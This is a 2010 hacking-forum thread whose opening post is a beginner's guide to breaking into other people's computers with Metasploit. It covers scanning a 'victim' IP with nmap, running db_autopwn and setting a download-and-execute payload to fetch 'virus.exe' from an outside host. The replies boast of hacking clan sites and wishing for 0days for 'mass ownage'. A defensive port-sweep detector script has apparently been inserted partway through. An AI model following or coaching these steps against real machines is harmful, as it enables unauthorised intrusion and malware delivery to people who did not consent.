KidPeek

Ritterkreuzträger
Allie
Posts: 105
Joined: Tue Jan 12, 2010 2:59 pm

KidPeek

Post by Ritterkreuzträger »

This will make you a really elite skid, I've reached the next level :)
So, what you need to do it:
A system lower than Vista, or any *nix. If you have none, just like me, I suggest you download VMWare and a WinXP VM image (thepiratebay.org). Also there is Backtrack, a nix system which, as I heard, is VERY powerful and has such tools already built in. But Backtrack is the first nix I ever tried to use, it is totally CMD only, so I don't even know any commands and stuff, I gave it up after 10 minutes.
WinPCap. That's the main reason why you have to use anything except Vista or 7 - WinPCap ain't working on those systems.
Metasploit & NMap. Metasploit - powerful self-explanatory exploiting tool. NMap - powerful port scanner.
Because I have no Backtrack or nix, I will explain stuff for WinXP.
After installing Metasploit (NMap is included in the installer), do not launch Metasploit itself (well, you can, but then you will spend your time for great justice and the happy future of humanity), launch the update first. You will see some shit like "Configuring multi-user permissions", this may take 4-6 minutes, but this shit happens only at first launch.
After the update is completed, wait till the Update window is closed and then open the Metasploit console itself. Wait a little bit again, and when the window is booted up, write in:

Code:

db_create

This will create some kind of database which Metasploit will use and write stuff into at runtime.
Then we need to connect to this DB, write down:

Code:

db_connect

We are successfully connected to the DB. Now I will explain a few main functions, which will help you at the end.

Code:

Set - set something
Show - show something
Use - use something (Exploit or Payload)
Search - search in exploits by name and description
Exploit\Run - Run exploit
Check - check exploit

For example, we want to use some exploit:
First, we need to set the payload:
Set Payload http/appache_chunk (not exact, just example)
and then we need to set the exploit itself
use http/appache_chunk/blahdoh
and run the exploit
Exploit\Run (but sometimes it also requires connecting)
Well, for example we have a working exploit, but what does it do? How does this work and so on?
After we set the exploit and payload, we will write:

Code:

show info

This will show you info about the exploit you are using.

Code:

show options

For example, for the download_and_execute exploit this will show you RHOST, RPORT.

Code:

set RHOST http://sethioz.com/virus.exe
set RPORT 80

Then exploit.
That was the main part, now the easiest. Metasploit 3.4 has db_autopwn.
First, run CMD. Write in

Code:

ping IP

If you are sure that the target has a static IP and he is online, but packets aren't received, then he is using a firewall and is not exploitable at all.
If packets are received, then go on.
In Metasploit, write again db_create, db_connect.
Now the part where NMap comes into use:

Code:

nmap -sT -sV IP

This will probably give you a list of open ports and the user's OS. If the OS is not given, then he is not exploitable.
Next, write down:

Code:

db_autopwn -p -t -e

If you are lucky enough and the victim is gay enough, you will see a list of available exploits. If yes, here is where the first part of the article comes into use.
UPD: Damn, NMap sucks a lot. It gives you WRONG info. Use Blue's Port Scanner to find open ports on the IP and Acunetix Web Scanner to detect the OS. Then, use the Search thing.
Last edited by Ritterkreuzträger on Tue May 25, 2010 4:31 pm, edited 3 times in total.
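
Seen from the defending side, the `nmap -sT -sV` step in the post above appears in connection logs as one source touching many different ports on one host within seconds. The detector below is an added example, not part of the original post; the log format, addresses and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(\S+) SRC=(\S+) DST=(\S+) DPT=(\d+) PROTO=TCP$")


def build_sample_log():
    """Constructed sample data: one port sweep plus one ordinary web client."""
    base = datetime(2010, 5, 25, 16, 0, 0)
    fmt = "{} SRC={} DST=198.51.100.5 DPT={} PROTO=TCP"
    lines = []
    sweep_ports = [21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389]
    for i, port in enumerate(sweep_ports):  # 12 ports inside two seconds
        ts = base + timedelta(seconds=i // 6)
        lines.append(fmt.format(ts.isoformat(), "192.0.2.10", port))
    for i in range(12):  # same port every 5 s: normal browsing
        ts = base + timedelta(seconds=5 * i)
        lines.append(fmt.format(ts.isoformat(), "192.0.2.77", 80))
    return "\n".join(lines)


def find_port_sweeps(log_text, min_ports=10, window_seconds=5):
    """Return sorted (src, dst, peak_distinct_ports) for each flagged pair."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # (src, dst) -> (timestamp, port) in window
    peaks = {}
    for line in log_text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # ignore lines in other formats
        ts = datetime.strptime(match.group(1), "%Y-%m-%dT%H:%M:%S")
        key = (match.group(2), match.group(3))
        events = recent[key]
        events.append((ts, int(match.group(4))))
        while ts - events[0][0] > window:  # drop events older than window
            events.popleft()
        distinct = len({port for _, port in events})
        if distinct >= min_ports:
            peaks[key] = max(peaks.get(key, 0), distinct)
    return sorted((src, dst, n) for (src, dst), n in peaks.items())


if __name__ == "__main__":
    for src, dst, n in find_port_sweeps(build_sample_log()):
        print(f"possible port sweep: {src} -> {dst}, {n} distinct ports")
```

The repeated port-80 client stays below the threshold because the count is of distinct ports, not of connections.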
Sethioz
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown

Re: KidPeek

Post by Sethioz »

umm, what exactly is this supposed to do? last time i used metasploit, it had a GUI, using your web browser, running on any OS that supports web browsers.

as about linux based programs, vmware player is the way to go, works perfectly for everything i need, even for wireless cracking.

Re: KidPeek

Post by Ritterkreuzträger »

I have no idea how you launched it in a web browser.
Attachment: Безымянный.jpg (60.27 KiB)

Re: KidPeek

Post by Sethioz »

http://www.metasploit.com/framework/download/
it's been a long time, last i used it was back in avp2 days, when me and joonas were hacking their clan sites. it's been like 4 years at least, but as it seems now, it has different versions, i might just get back to it.

Re: KidPeek

Post by Ritterkreuzträger »

Not really needed, only 1 of 10 computers is vulnerable. But also it can hack web sites, I think. But also, they might be based on some gay hosting.

Re: KidPeek

Post by Sethioz »

still not sure what you're trying to do here... but as for metasploit, check the screenshot.

metasploit is quite useless, because developers are sissies, just like 99.9% of ppl who write such tools, they are completely out of date. like the latest phpbb exploit available there is for phpbb 2.0.15 lol... the latest phpbb2 out there should be 2.0.25 and mine is phpbb3 already, they are just too sissy to put REAL stuff in there.
Attachment: metas1.JPG (54.87 KiB)

Re: KidPeek

Post by Ritterkreuzträger »

Doesn't work for me, probably I have to use another port?
Also, I've heard it is possible to put in your own exploit, I think I saw it somewhere on their site, or Backtrack's forum.

Re: KidPeek

Post by Sethioz »

sure, but it's not easy as 123 + there's not much point, i don't really like such idiots who are too pussy to put the REAL exploits in there, something like 0day, which would cause mass ownage, yes i know that my own site would be at risk too, but i'm willing to take that risk.

i just launched the mfsweb or whatever it was, can't bother to check (it's in my virtual machine and it ain't running), it automatically launched the browser too after it was initialized and showed this page.

change topic title?!

Re: KidPeek

Post by Ritterkreuzträger »

Anyways, I'm not that good at making exploits, I'm only able to use ones other ppl made. And I'm not that VIP (Gay) to know private ones.
About MFSWeb, yes I'm a bonehead, didn't know it before. But this is very slow for me.